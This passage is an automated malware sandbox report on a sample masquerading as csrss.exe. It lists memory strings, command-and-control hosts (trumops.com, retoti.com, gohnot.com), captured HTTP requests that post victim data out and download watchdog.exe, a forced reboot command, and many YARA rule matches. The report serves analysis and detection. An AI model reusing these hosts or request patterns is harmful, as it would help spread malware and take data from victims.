          Source: csrss.exe, 0000000A.00000002.931442787.000000001199A000.00000004.00000001.sdmpString found in binary or memory: https://trumops.com/api/logGlobal
          Source: csrss.exe, 0000000A.00000002.931399216.000000001195E000.00000004.00000001.sdmpString found in binary or memory: https://trumops.com/api/logdefault
          Source: csrss.exe, 0000000A.00000003.825189031.0000000011998000.00000004.00000001.sdmpString found in binary or memory: https://trumops.com/api/logmountvol.commountvol.exemountvol.batmountvol.cmdmountvol.vbsmountvol.vbem
          Source: jkDmft1Qoe.exe, 00000000.00000002.669814323.00000000118B8000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comServiceVersionServiceVersionServersVersionDistributorIDCampaignIDOSCaption
          Source: jkDmft1Qoe.exe, 00000004.00000002.681186282.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.701725692.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000016.00000002.704417862.00000000118DC000.00000004.00000001.sdmp, csrss.exe, 00000019.00000002.708218344.00000000118D6000.00000004.00000001.sdmp, csrss.exe, 0000001C.00000002.709002807.000000001187C000.00000004.00000001.sdmp, csrss.exe, 00000020.00000002.724004382.00000000118BA000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic
          Source: jkDmft1Qoe.exe, 00000000.00000002.669832232.00000000118C0000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta
          Source: csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.701750909.0000000011814000.00000004.00000001.sdmp, csrss.exe, 00000016.00000002.704682561.00000000118EA000.00000004.00000001.sdmp, csrss.exe, 00000019.00000002.708360618.00000000118E8000.00000004.00000001.sdmp, csrss.exe, 0000001C.00000002.709694172.00000000118E8000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpString found in binary or memory: https://trumops.comif-unmodified-sinceillegal
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpString found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)gentraceback
          Source: svchost.exe, 00000028.00000003.787075201.000001BD3A19A000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
          Source: svchost.exe, 00000028.00000003.787075201.000001BD3A19A000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
          Source: unknownHTTP traffic detected: POST /bots/post-ia-data?uuid=8db1a514-f568-41bf-af6a-dffb7cea0346 HTTP/1.1Host: server1.trumops.comUser-Agent: Go-http-client/1.1Content-Length: 19043Content-Type: application/json; charset=UTF-8Accept-Encoding: gzip
          Source: unknownDNS traffic detected: queries for: trumops.com
          Source: global trafficHTTP traffic detected: GET /api/cdn?c=1a0ceff6e935c933&uuid=8db1a514-f568-41bf-af6a-dffb7cea0346 HTTP/1.1Host: server1.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
          Source: global trafficHTTP traffic detected: GET /370c4779d730135afa0e64399be9936c/watchdog.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: 8db1a514-f568-41bf-af6a-dffb7cea0346Version: 183Accept-Encoding: gzip

          System Summary:

          barindex
          Uses shutdown.exe to shutdown or reboot the systemShow sources
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
          Source: jkDmft1Qoe.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
          Source: 34.0.csrss.exe.9a7760.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 4.0.jkDmft1Qoe.exe.9af360.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 34.2.csrss.exe.9a7760.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 32.2.csrss.exe.9a7760.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 0.2.jkDmft1Qoe.exe.9a7760.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 28.0.csrss.exe.9a7760.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 0.0.jkDmft1Qoe.exe.9af360.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 32.0.csrss.exe.9af360.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 34.0.csrss.exe.9ad100.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 17.0.csrss.exe.9af360.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 17.0.csrss.exe.9a7760.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 10.2.csrss.exe.9af360.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 34.2.csrss.exe.9af360.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 0.0.jkDmft1Qoe.exe.9ad100.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 17.0.csrss.exe.9ad100.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 25.0.csrss.exe.9ad100.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 28.2.csrss.exe.9a7760.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 4.0.jkDmft1Qoe.exe.9ad100.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 28.2.csrss.exe.9ad100.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 22.0.csrss.exe.9a7760.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 10.0.csrss.exe.9a7760.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 4.2.jkDmft1Qoe.exe.9ad100.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 10.0.csrss.exe.9ad100.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 0.2.jkDmft1Qoe.exe.9af360.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 4.2.jkDmft1Qoe.exe.9a7760.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 0.2.jkDmft1Qoe.exe.9ad100.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 17.2.csrss.exe.9a7760.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 25.2.csrss.exe.9ad100.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 17.2.csrss.exe.9ad100.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 22.0.csrss.exe.9af360.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 10.2.csrss.exe.9ad100.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 25.2.csrss.exe.9a7760.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 22.2.csrss.exe.9a7760.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 4.2.jkDmft1Qoe.exe.9af360.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 25.0.csrss.exe.9a7760.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 34.2.csrss.exe.9ad100.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 22.2.csrss.exe.9ad100.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 22.2.csrss.exe.9af360.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 32.2.csrss.exe.9ad100.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 28.2.csrss.exe.9af360.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 10.2.csrss.exe.9a7760.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 25.0.csrss.exe.9af360.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 25.2.csrss.exe.9af360.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 17.2.csrss.exe.9af360.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 10.0.csrss.exe.9af360.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 0.0.jkDmft1Qoe.exe.9a7760.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 34.0.csrss.exe.9af360.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 4.0.jkDmft1Qoe.exe.9a7760.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 32.2.csrss.exe.9af360.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 32.0.csrss.exe.9ad100.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 22.0.csrss.exe.9ad100.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 28.0.csrss.exe.9ad100.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 28.0.csrss.exe.9af360.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 32.0.csrss.exe.9a7760.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 00000016.00000002.701157645.0000000000991000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 00000004.00000002.678501947.0000000000991000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 00000022.00000000.719194989.000000000098A000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 0000000A.00000002.927094203.0000000000991000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 00000020.00000002.722563004.0000000000991000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 0000001C.00000000.702563257.000000000098A000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 00000022.00000002.723109037.0000000000991000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
